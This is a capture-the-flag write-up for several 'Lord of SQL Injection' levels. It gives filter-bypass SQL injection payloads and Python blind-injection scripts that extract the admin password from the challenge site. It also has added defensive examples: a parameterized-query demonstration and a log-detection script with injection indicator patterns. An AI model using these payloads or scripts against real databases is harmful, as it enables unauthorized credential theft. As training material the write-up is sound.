Lord of SQL Injection Write-Up (1)

orc

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 

  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");
  highlight_file(__FILE__); 

The backend filters the table name (the string prob), so the injected code cannot name the table. A column referenced inside the where clause, however, is resolved against the table named in the outer from, so the query needs no table name at all.

payload

?pw=1'or id='admin' and ascii(binary(substr((pw),3,1)))>53%23

The pw column here is resolved against prob_orc, the table named in the outer from clause.
id='admin' is there so that the row being tested, and therefore the pw being read, is admin's.

Blind injection script

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
desc: orc blind injection script
author: huha
'''
import requests

def doinject(url, sqli_input, i, num):
    # One boolean probe: is character i+1 of sqli_input greater than num?
    payload = "and ascii(binary(substr((%s),%d,1)))>%d" % (sqli_input, i + 1, num)
    payload += '%23'  # URL-encoded '#', comments out the rest of the query
    print(url + payload)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Cookie': 'PHPSESSID=9fpfms0cnvii35netn60uskb03'
    }
    r = requests.get(url + payload, headers=headers, timeout=20)
    # Decide from the response whether the probe was true
    return "Hello admin" in r.text

def getvalue(url, length, sqli_input):
    # Binary search over printable ASCII (33..126) for each character position
    flag = ''
    for i in range(length):
        s = 33
        t = 126
        while s < t:
            m = (s + t) // 2
            if doinject(url, sqli_input, i, m):
                s = m + 1   # character is greater than m
            else:
                t = m       # character is at most m
            if t - s <= 1:
                # Narrowed down to {s, t}: one more probe decides
                m = t if doinject(url, sqli_input, i, s) else s
                break
        flag += chr(m)
        print(flag)

if __name__ == '__main__':
    # Target URL
    base_url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php"
    query = "?pw=1'or id='admin' "
    url = base_url + query
    # The expression whose characters are recovered
    sqli_input = "pw"
    getvalue(url, 30, sqli_input)

orge

  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge");
  highlight_file(__FILE__); 

Similar to orc, except that or is filtered, so || is used instead. Note that what we need is admin's password, not guest's.

payload

'|| id='admin' %26%26 ascii(mid((select pw from (select 1)a),1,1))>79%23

The & character must be URL-encoded as %26; otherwise HackBar, or a Python blind injection script, treats it as a parameter separator.
Although the table name is filtered, a column named inside the where clause is resolved against the table automatically.

Two ways to read the pw column without naming the table:

select pw from (select 1)a
select pw

Blind injection script

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
desc: orge blind injection script
author: huha
'''
import requests

def doinject(url, sqli_input, i, num):
    # One boolean probe: is character i+1 of sqli_input greater than num?
    probe = "ascii(mid((select %s from (select 1)a),%d,1))>%d" % (sqli_input, i + 1, num)
    # %26 is an encoded '&' (a raw '&' would split the parameter); %23 is an encoded '#'
    payload = "'|| id='admin' %26%26 " + probe + '%23'
    print(url + payload)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Cookie': 'PHPSESSID=mk1fatv9vr1fj4812fmopbmmr6'
    }
    r = requests.get(url + payload, headers=headers, timeout=20)
    # Decide from the response whether the probe was true
    return "Hello admin" in r.text

def getvalue(url, length, sqli_input):
    # Binary search over printable ASCII (33..126) for each character position
    flag = ''
    for i in range(length):
        s = 33
        t = 126
        while s < t:
            m = (s + t) // 2
            if doinject(url, sqli_input, i, m):
                s = m + 1   # character is greater than m
            else:
                t = m       # character is at most m
            if t - s <= 1:
                # Narrowed down to {s, t}: one more probe decides
                m = t if doinject(url, sqli_input, i, s) else s
                break
        flag += chr(m)
        print(flag)

if __name__ == '__main__':
    # Target URL
    base_url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php"
    query = "?pw="
    url = base_url + query
    # The expression whose characters are recovered
    sqli_input = "pw"
    getvalue(url, 30, sqli_input)

skeleton

  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id'] == 'admin') solve("skeleton"); 
  highlight_file(__FILE__); 

and binds tighter than or, so the trailing and 1=0 only applies to the last term; the payload relies on this to bypass the check.

payload

https://los.rubiya.kr/chall/skeleton_a857a5ab24431d6fb4a00577dac0f39c.php?pw=' or id = 'admin' or '1
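As an added example that is not part of the original write-up, the Python script below rebuilds the skeleton query against an in-memory SQLite table to show, on the defender's side, why the string-built query accepts the payload above and why a parameterized query does not. It also runs the challenge's own deny-list regex over the payload, to show that the filter is not what protects the query. The table rows, the admin password and the function names are constructed for this example; SQLite stands in for MySQL because the and/or precedence rule is the same.

```python
import re
import sqlite3

# Constructed sample data: a stand-in for the challenge's prob_skeleton table.
ROWS = [("guest", "guest"), ("admin", "constructed_admin_pw")]

# The challenge's own deny-list from the PHP above, as a case-insensitive regex.
DENYLIST = re.compile(r"prob|_|\.|\(\)", re.IGNORECASE)


def make_db():
    """Create an in-memory SQLite table shaped like prob_skeleton."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table prob_skeleton (id text, pw text)")
    conn.executemany("insert into prob_skeleton values (?, ?)", ROWS)
    return conn


def denylist_blocks(pw):
    """True if the challenge's preg_match filter would reject this input."""
    return DENYLIST.search(pw) is not None


def lookup_interpolated(conn, pw):
    """The vulnerable form: the input is spliced into the SQL text.

    The trailing 'and 1=0' is meant to make the query never match, but AND
    binds tighter than OR, so an injected OR term is evaluated on its own:
      (id='guest' and pw='') or (id='admin') or ('1' and 1=0)
    """
    query = "select id from prob_skeleton where id='guest' and pw='%s' and 1=0" % pw
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def lookup_parameterized(conn, pw):
    """The hardened form: the input is bound as a value and never parsed as SQL."""
    query = "select id from prob_skeleton where id='guest' and pw=? and 1=0"
    row = conn.execute(query, (pw,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "' or id = 'admin' or '1"   # the skeleton payload from this write-up
    db = make_db()
    print("deny-list blocks payload:  ", denylist_blocks(payload))        # False
    print("interpolated query returns:", lookup_interpolated(db, payload))  # admin
    print("parameterized query returns:", lookup_parameterized(db, payload))  # None
```

The deny-list lets the payload through untouched, the interpolated query returns the admin row despite its `and 1=0`, and the bound parameter version returns nothing because the quotes and `or` stay inside the value. Parameterization, not pattern filtering, is the fix for every level in this write-up.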

golem

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
  highlight_file(__FILE__); 

The equals sign is filtered; use like instead.

payload

https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='|| id like 'admin' %26%26 ascii(mid((select pw from (select 1)a),1,1))<79%23

The blind injection script is built the same way as the earlier ones and is not repeated here.

darkknight

  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
  highlight_file(__FILE__); 

like replaces the equals sign, and since the single quote is filtered, string values are written as hexadecimal literals.

payload

?pw=1&no=1 or id like 0x61646D696E and binary(mid((select pw),1,1))>0x4f

Blind injection script

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
desc: darkknight blind injection script
author: huha
'''
# The header and the first lines of doinject() were lost when this page was
# extracted; they are reconstructed here to match the orc and orge scripts above.
import requests

def doinject(url, sqli_input, i, num):
    # Single quotes are filtered in no, so the compared value is sent as a hex literal
    payload = "binary(mid((select %s),%d,1))>%s" % (sqli_input, i + 1, hex(int(num)))
    print(url + payload)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Cookie': 'PHPSESSID=tqrsls0kklon0lgkaor0omjv1s'
    }
    r = requests.get(url + payload, headers=headers, timeout=20)
    # Decide from the response whether the probe was true
    return "Hello admin" in r.text

def getvalue(url, length, sqli_input):
    # Binary search over printable ASCII (33..126) for each character position
    flag = ''
    for i in range(length):
        s = 33
        t = 126
        while s < t:
            m = (s + t) // 2
            if doinject(url, sqli_input, i, m):
                s = m + 1   # character is greater than m
            else:
                t = m       # character is at most m
            if t - s <= 1:
                # Narrowed down to {s, t}: one more probe decides
                m = t if doinject(url, sqli_input, i, s) else s
                break
        flag += chr(m)
        print(flag)

if __name__ == '__main__':
    # Target URL
    base_url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
    query = "?pw=1&no=1 or id like 0x61646D696E and "
    url = base_url + query
    # The expression whose characters are recovered
    sqli_input = "pw"
    getvalue(url, 30, sqli_input)

bugbear

  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
  highlight_file(__FILE__); 

This level filters more: 0x, the space, like, or and and. Each is countered in turn:
like is replaced by in
the hexadecimal string literal is replaced by CHAR()
the space is replaced by a /**/ comment
or and and are replaced by || and &&

payload

?pw=1&no=1||id/**/in(select/**/CHAR(97,100,109,105,110))%26%26binary(mid((pw),1,1))<CHAR(97)

The blind injection script is built the same way as in the previous level and is not repeated here.

giant

1) exit("No Hack ~_~");
  if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
  $query = "select 1234 from{$_GET[shit]}prob_giant where 1";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result[1234]) solve("giant");
  highlight_file(__FILE__);
?>

The goal is clear: find a character that MySQL accepts as whitespace but that the filter does not block.
Generate a dictionary of all single-byte values locally:

for x in range(0, 256):
    print('%{0:02x}'.format(x))

[image]
Fuzz the parameter with Burp using that list:
[image]
%0b (vertical tab) and %0c (form feed) are accepted as whitespace.
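The following Python script is an added example, not part of this write-up: it runs simple detection logic over a few constructed access-log lines that imitate what the techniques in these levels leave behind (the orc probes, the bugbear payload, and the giant whitespace byte). The log lines, IP addresses and paths are constructed for the example and the indicator names are this example's own. It flags requests by the constructs seen above (comment terminators, || and &&, hex or CHAR() literals, substr/mid/ascii/binary, like or in(, and the %0b/%0c bytes) and groups probes that differ only in their numeric comparison value, which is the fingerprint of the binary-search scripts above.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed sample log lines (combined log format, shortened). Not from the
# write-up: they imitate the requests the techniques above produce, plus one
# benign login request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /chall/orc.php?pw=1%27or%20id%3D%27admin%27%20and%20ascii(binary(substr((pw),1,1)))%3E53%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /chall/orc.php?pw=1%27or%20id%3D%27admin%27%20and%20ascii(binary(substr((pw),1,1)))%3E79%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /chall/orc.php?pw=1%27or%20id%3D%27admin%27%20and%20ascii(binary(substr((pw),1,1)))%3E66%23 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:01:00 +0000] "GET /chall/bugbear.php?pw=1&no=1||id/**/in(select/**/CHAR(97,100,109,105,110))%26%26binary(mid((pw),1,1))%3CCHAR(97) HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2020:10:01:05 +0000] "GET /chall/giant.php?shit=%0b HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2020:10:02:00 +0000] "GET /chall/orc.php?pw=hunter2 HTTP/1.1" 200 480
"""

# Each indicator is one construct used somewhere in this write-up. Names are
# this example's own choice.
INDICATORS = {
    "sql_comment": re.compile(r"#|--|/\*.*?\*/"),
    "logical_operator_substitute": re.compile(r"\|\||&&"),
    "hex_or_char_literal": re.compile(r"0x[0-9a-f]+|\bchar\s*\(", re.I),
    "string_probe_function": re.compile(r"\b(substr|mid|ascii|binary)\s*\(", re.I),
    "like_or_in": re.compile(r"\blike\b|\bin\s*\(", re.I),
    "odd_whitespace_byte": re.compile(r"[\x0b\x0c]"),   # %0b / %0c after decoding
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def parse_line(line):
    """Return (ip, path, URL-decoded query) for one combined-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return m.group("ip"), parts.path, unquote(parts.query)


def indicators_for(query):
    """Sorted names of the indicators present in a decoded query string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))


def normalize(query):
    """Collapse digit runs so probes that differ only in the compared value
    (>53 vs >79) or the character position (1 vs 2) group together."""
    return re.sub(r"\d+", "N", query)


def flagged_requests(log_text):
    """[(ip, path, indicators)] for every request with at least one indicator."""
    out = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, query = parsed
        hits = indicators_for(query)
        if hits:
            out.append((ip, path, hits))
    return out


def blind_injection_bursts(log_text, threshold=3):
    """{(ip, path, normalized query): count} for groups at or above threshold.

    A binary search over 33..126 needs about seven probes per character, so a
    single source repeating the same shape of query with only the numbers
    changing is the signal to alert on."""
    counts = Counter()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, query = parsed
        if indicators_for(query):
            counts[(ip, path, normalize(query))] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, path, hits in flagged_requests(SAMPLE_LOG):
        print("%s %s: %s" % (ip, path, ", ".join(hits)))
    for (ip, path, norm), n in blind_injection_bursts(SAMPLE_LOG).items():
        print("possible blind-injection burst: %s %s x%d  %s" % (ip, path, n, norm))
```

The per-request indicators catch the bugbear and giant payloads on a single line, while the orc probes are individually weak (one comment and a string function) but group into a burst of three from one source; in a real log the threshold would be tuned to the seven-or-so probes per recovered character that the scripts above need.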
